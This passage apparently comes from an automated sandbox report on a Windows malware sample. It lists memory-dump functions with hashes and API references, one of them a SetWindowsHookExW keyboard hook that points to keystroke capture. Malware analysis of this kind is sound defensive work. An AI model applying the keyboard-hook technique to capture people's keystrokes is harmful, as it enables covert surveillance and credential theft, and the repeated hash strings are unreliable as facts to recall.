                                                                                              • Instruction ID: 566b4ad1c58865e383a2c7a8027fae4534ffb3832e57d1e2cc0c508a302e1448
                                                                                              • Opcode Fuzzy Hash: 14b333b43dab281921b62704f451d0236e0e32370a78b6656f5b88aca5908418
                                                                                              • Instruction Fuzzy Hash: F5C04C77818148EAD750EF65D8C7B0573E4BF21604F98845DC1D4DA142CA6E9019CB26
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BCDE0, Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0f267a813db66ae7de12f1b0ce508b0d875f504c7ffeab7c6af6ddf04fa454da
                                                                                              • Instruction ID: b1856e39aa08b93cc7ec38e32a3a76d1a9c0ef985599c7af95d8c99616d6cf60
                                                                                              • Opcode Fuzzy Hash: 0f267a813db66ae7de12f1b0ce508b0d875f504c7ffeab7c6af6ddf04fa454da
                                                                                              • Instruction Fuzzy Hash: 3BC08C22C6A3805FDF438B208C289463FA9AF4330170100CBC202DF0E2EA288406CF56
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058B1B08, Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 99edc28c7055cd218031e5f5fe8d729351c12d7031d83b83b866ebf4bd327742
                                                                                              • Instruction ID: c0e34d296f99e9b78111fa2262f8313decb0ae7ca1348762b70d91d2207ee17b
                                                                                              • Opcode Fuzzy Hash: 99edc28c7055cd218031e5f5fe8d729351c12d7031d83b83b866ebf4bd327742
                                                                                              • Instruction Fuzzy Hash: 55C04C30610105CBDF40DF18F04CA643775F740306F440554D802CA524D77C9E88DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 058BAF20, Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.260725331.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c2d75c7868bdf677b7508ddf55080e4d67bb2bdcb9537477d8742fe801feabdd
                                                                                              • Instruction ID: dfc1de657db82dba174ebddfe84da4ed8a6377148210d05ea5b45de0ff8fd1a4
                                                                                              • Opcode Fuzzy Hash: c2d75c7868bdf677b7508ddf55080e4d67bb2bdcb9537477d8742fe801feabdd
                                                                                              • Instruction Fuzzy Hash: A5B092219AD3D88FDF02EB20AC6E8543F316A4371531500D6E980CB0A2EA20980CC706
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 0320C2B0, Relevance: .5, Instructions: 520COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5bc4379c1fea36fd5b356704dbe704c4b63b3bcb589f49b7c9cf70679d03c990
                                                                                              • Instruction ID: 2b6d0e6723c9bebb38eb17f89ef36bb24fbf31a6eed192b71b98449fb3f8011c
                                                                                              • Opcode Fuzzy Hash: 5bc4379c1fea36fd5b356704dbe704c4b63b3bcb589f49b7c9cf70679d03c990
                                                                                              • Instruction Fuzzy Hash: 3C5249B1520706CBD710CF24E48A599BFF1FB41318F918219E1625FAD1DBF8658AEF84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 03209990, Relevance: .3, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.256224479.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1cf5fa59d463b30d7a4e900181c611b9555b97e21922db085dd6a9a20be49735
                                                                                              • Instruction ID: e4cfa57f278e832076aab417f91ed0f35faf3342024092af0f7fad7703c3e2f7
                                                                                              • Opcode Fuzzy Hash: 1cf5fa59d463b30d7a4e900181c611b9555b97e21922db085dd6a9a20be49735
                                                                                              • Instruction Fuzzy Hash: 61A17136E2031A8FCF15DFA5C84459DBBB2FF89300B15856AE905BB262DB71D989CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: SecuriteInfo.com.Win32.18332.exe PID: 6844 Parent PID: 6660 SecuriteInfo.com.Win32.18332.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 0127D8A0, Relevance: 2.3, APIs: 1, Instructions: 786COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505478790.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 95c3d74ecf45d117d9ad409246e30ef71ff90a46e667ee3c34239e7dab8d01ad
                                                                                              • Instruction ID: 87157c735e66e9f5b3a5771b45a8c14a5bf7ced93eb9f220e3ff00687f6bc772
                                                                                              • Opcode Fuzzy Hash: 95c3d74ecf45d117d9ad409246e30ef71ff90a46e667ee3c34239e7dab8d01ad
                                                                                              • Instruction Fuzzy Hash: 84623A30E147198FDB24EF78C8546AEB7F2AF89304F1185AAD609AB750EF709D85CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01245608, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505426232.0000000001240000.00000040.00000001.sdmp, Offset: 01240000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4742a151a7e1a2b65f428a7682eeb1ba9627acf5f1d660811069fa4ebd02d2c
                                                                                              • Instruction ID: 9d227d3f2c4f252383a762d315220d89ffa25ce0c6ae35b8daa59426dfafc7cc
                                                                                              • Opcode Fuzzy Hash: b4742a151a7e1a2b65f428a7682eeb1ba9627acf5f1d660811069fa4ebd02d2c
                                                                                              • Instruction Fuzzy Hash: D6F15B34A10209CFDB18DFA9C888BADBBF2FF48304F158569E549AF265DB74A945CF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0125F410, Relevance: 1.7, APIs: 1, Instructions: 224libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 3e67638862868db4231c96990a766b4118b6131abfdf9dd8cc36604556f5bd1f
                                                                                              • Instruction ID: bcadaa5e1e22c82ccdda49310f55a51ecf448e2c283bc58b9e2d768e0c9f19fc
                                                                                              • Opcode Fuzzy Hash: 3e67638862868db4231c96990a766b4118b6131abfdf9dd8cc36604556f5bd1f
                                                                                              • Instruction Fuzzy Hash: E071F471B102058FDB04EFB8D984ABEBBA6EF84214F15857ADA11DB351EF34D805C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 012F58A0, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 012F8B6B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505569763.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 3d91d41248d9bbe76fb449f372cd5e9de21259027e22d5ecd9bda52f900660da
                                                                                              • Instruction ID: 6d2926c1350a77b7bee062c0a1dc784f418439924ac232bc540b54537ee1af9e
                                                                                              • Opcode Fuzzy Hash: 3d91d41248d9bbe76fb449f372cd5e9de21259027e22d5ecd9bda52f900660da
                                                                                              • Instruction Fuzzy Hash: 192135B19042098FCB10CF99C844BEEFBF4EB88314F14842AE519A7350DB74A944CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250A66, Relevance: 6.9, APIs: 4, Instructions: 915libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 88821d8ef65857895c9720c8157bbb6e0bb2c320c1a34c631c2f3a9e0d3ed7a6
                                                                                              • Instruction ID: ab0285adc390c67a3bd51a10565d4496c070ffde7a64377506842f761cb4e2cb
                                                                                              • Opcode Fuzzy Hash: 88821d8ef65857895c9720c8157bbb6e0bb2c320c1a34c631c2f3a9e0d3ed7a6
                                                                                              • Instruction Fuzzy Hash: 29921974A14228CFCB65EF30D8987ADB7BABF88205F1045E9DA09A3350DB359E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250A87, Relevance: 6.6, APIs: 4, Instructions: 588libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: c512a83b8b7addcbe16f386633dd5bb1524da507efb1309f096811cdf209958d
                                                                                              • Instruction ID: c0ae7bd23261ba73e4176d3824be86af8d925572437c7a48e21044c1fdd64ce8
                                                                                              • Opcode Fuzzy Hash: c512a83b8b7addcbe16f386633dd5bb1524da507efb1309f096811cdf209958d
                                                                                              • Instruction Fuzzy Hash: 7D521774A14228CFCB65EF30C8987ADB7BABF89205F1085E9D909A3340DB359E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250ACC, Relevance: 6.6, APIs: 4, Instructions: 581libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: abd8d697d004a094b9fd7e16c08afe1bf16e2685cc4cdacbddfdcc7e69f5aeec
                                                                                              • Instruction ID: 3d462583b06fb8f8919fa179851b03c46bb822b4c504696ce6e4d8ed38b7b288
                                                                                              • Opcode Fuzzy Hash: abd8d697d004a094b9fd7e16c08afe1bf16e2685cc4cdacbddfdcc7e69f5aeec
                                                                                              • Instruction Fuzzy Hash: 50420874A14228CFCB65EF30C8987ADB7BABF89205F1085E9D909A3340DB359E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250B11, Relevance: 6.6, APIs: 4, Instructions: 574libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 9e6adca2fe1107bf9a4c3acd5991d5930ec80ec5aaab33d7a16df706ec68dbbf
                                                                                              • Instruction ID: 81abd28e39da45b0f6efed3f3cb42846cd869aace02fcfe48819903844523fca
                                                                                              • Opcode Fuzzy Hash: 9e6adca2fe1107bf9a4c3acd5991d5930ec80ec5aaab33d7a16df706ec68dbbf
                                                                                              • Instruction Fuzzy Hash: 84420874A14228CFCB65EF30C8987ADB7BABF89205F1085E9D909A3340DB359E85CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250B56, Relevance: 6.6, APIs: 4, Instructions: 567libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: a1e42b6cb9a99b944b4370d659ef37ae9d5bffd9d975ba70025987a65716d59f
                                                                                              • Instruction ID: 373de83932e4bb633bf9d226d01b6e76a627dc2d0cdfd53dcf9cd0006da053ce
                                                                                              • Opcode Fuzzy Hash: a1e42b6cb9a99b944b4370d659ef37ae9d5bffd9d975ba70025987a65716d59f
                                                                                              • Instruction Fuzzy Hash: 51420774A14228CFCB65EF30C8987ADB7BAAF89205F1085E9D909A3340DB359E81CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250B9B, Relevance: 6.6, APIs: 4, Instructions: 560libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 0f38262cfb393faf81c37b13e1098e1681e37ffe463ac79ffa1386b680dad2fd
                                                                                              • Instruction ID: b24f7ac0d7e2c989a7bf3aa843552c07a7053bf52cbcf742714683ca7a1dc038
                                                                                              • Opcode Fuzzy Hash: 0f38262cfb393faf81c37b13e1098e1681e37ffe463ac79ffa1386b680dad2fd
                                                                                              • Instruction Fuzzy Hash: 46420874A14228CFCB65EF30C8987ADB7BAAF89205F1085E9D909A3350DF359E81CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250BE0, Relevance: 6.6, APIs: 4, Instructions: 553libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: e098899eb8d2ec793c0b43f7d513ab7f4eaa19c908fb23bb54a91c3fe72c521b
                                                                                              • Instruction ID: 0597b5d7c2f9586213f49da8b52b38f4dbdd7105da8080f543e4d334f35ec76f
                                                                                              • Opcode Fuzzy Hash: e098899eb8d2ec793c0b43f7d513ab7f4eaa19c908fb23bb54a91c3fe72c521b
                                                                                              • Instruction Fuzzy Hash: 28420874A14228CFCB65EF30C8987ADB7BAAF89205F1085E9D909A3340DF359E81CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250C25, Relevance: 6.5, APIs: 4, Instructions: 546libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 4d63a972699bc3817c0d9f54863aadc847697905f54aa4b22d6e3fa2dbfa1773
                                                                                              • Instruction ID: 5c0dda7f78a7052f7f71153cf1b8e378b97e0bf25ad7949cb2dcb2edbf6b1f76
                                                                                              • Opcode Fuzzy Hash: 4d63a972699bc3817c0d9f54863aadc847697905f54aa4b22d6e3fa2dbfa1773
                                                                                              • Instruction Fuzzy Hash: 49421874A14228CFCB65EF30C8987ADB7BAAF89205F1085E9D909A3340DF359E81CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250C6A, Relevance: 6.5, APIs: 4, Instructions: 539libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: de3a9a64baa2722ea2f77b1a97ac210044364ea7bac0dd824f7bea17ac55ef65
                                                                                              • Instruction ID: 99e6de80acafd71ecb4a5769bbd9324b2fb7434d315aa7bc51270eaae307ed4d
                                                                                              • Opcode Fuzzy Hash: de3a9a64baa2722ea2f77b1a97ac210044364ea7bac0dd824f7bea17ac55ef65
                                                                                              • Instruction Fuzzy Hash: C5421974A14228CFCB65EF34C8987ADB7BAAF89205F1085E9D909A3340DF359E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250CAF, Relevance: 6.5, APIs: 4, Instructions: 532libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: e5b1389fe52ea2e86d63fe72335b15ba310265fd7ec637fecd9f7e12e0c9e5fa
                                                                                              • Instruction ID: c2d0bc1b90793940b39411c72b559139253b4b8b7cc96acb815021e449425efd
                                                                                              • Opcode Fuzzy Hash: e5b1389fe52ea2e86d63fe72335b15ba310265fd7ec637fecd9f7e12e0c9e5fa
                                                                                              • Instruction Fuzzy Hash: CE321974A14228CFCB65EF34C8987ADB7BAAF89205F1085E9D909A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250CF4, Relevance: 6.5, APIs: 4, Instructions: 525libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 824b2cccadc1bcafbe8ae23e593297e8c6a495c4c7bbcdc87c243b64c9773fcd
                                                                                              • Instruction ID: c69aa6458c253464fbd0324e152d46d22796ffc58d8b90796249e7a55ca0ce03
                                                                                              • Opcode Fuzzy Hash: 824b2cccadc1bcafbe8ae23e593297e8c6a495c4c7bbcdc87c243b64c9773fcd
                                                                                              • Instruction Fuzzy Hash: AD321974A14228CFCB65EF34C8987ADB7BAAF89205F1085E9D909A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250D39, Relevance: 6.5, APIs: 4, Instructions: 518libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: f14c69b40418063e31b780bc5548db69df1f3e193a61074c5361b573f14f7d4a
                                                                                              • Instruction ID: 6ebb68bcf80d390a3f924149b34a85f1912abbc9d67219e8348968ca6781addc
                                                                                              • Opcode Fuzzy Hash: f14c69b40418063e31b780bc5548db69df1f3e193a61074c5361b573f14f7d4a
                                                                                              • Instruction Fuzzy Hash: AB321974A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF359E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250D7E, Relevance: 6.5, APIs: 4, Instructions: 511libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: 8a285cb798ea77291c26bce941cf82bbf3373c56aaa3aa1887ad849b96aaf03c
                                                                                              • Instruction ID: d9160dd72545ba66ebf84356cdb57a0bcc9e5e7aa8e628f9f870017750489fc2
                                                                                              • Opcode Fuzzy Hash: 8a285cb798ea77291c26bce941cf82bbf3373c56aaa3aa1887ad849b96aaf03c
                                                                                              • Instruction Fuzzy Hash: BC321A74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250DC3, Relevance: 6.5, APIs: 4, Instructions: 504libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: d84a4102221cbb7ff70f3e3953d1b7fe7da261c2356257aac2af99e7c81ecabd
                                                                                              • Instruction ID: d9d67a9b9a99ec055b5ff9af8d9fb23988552a89fb5ba3c3537767a1a4320c7e
                                                                                              • Opcode Fuzzy Hash: d84a4102221cbb7ff70f3e3953d1b7fe7da261c2356257aac2af99e7c81ecabd
                                                                                              • Instruction Fuzzy Hash: 1A322B74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF349E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250E08, Relevance: 6.5, APIs: 4, Instructions: 497libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250E2C
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: cdd7d213befb75f347b14b9e28956957b5a465e5bfe2a84e79a9f1c1ce9a22e1
                                                                                              • Instruction ID: eff91009887da83e93397439b75e186177bca4b7998e3ebb6879324874a3ba46
                                                                                              • Opcode Fuzzy Hash: cdd7d213befb75f347b14b9e28956957b5a465e5bfe2a84e79a9f1c1ce9a22e1
                                                                                              • Instruction Fuzzy Hash: DB322B74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF749E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250E4D, Relevance: 5.0, APIs: 3, Instructions: 490libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
                                                                                              • LdrInitializeThunk.NTDLL ref: 012512B5
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 0125176B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.505440921.0000000001250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2638914809-0
                                                                                              • Opcode ID: cbc3e4aca1bb799910c4e5db8921ca0147d430b01304a7d7244b45c6795e941d
                                                                                              • Instruction ID: cafe686970359f4b011484dbfb7ccfea60ce225d7a19cfd8d1a00ffc416224aa
                                                                                              • Opcode Fuzzy Hash: cbc3e4aca1bb799910c4e5db8921ca0147d430b01304a7d7244b45c6795e941d
                                                                                              • Instruction Fuzzy Hash: F3221B74A14228CFCB65EF34C8987ADB7BAAF88205F1085E9D909A3350DF749E85CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01250E92, Relevance: 5.0, APIs: 3, Instructions: 483libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 01250FCA
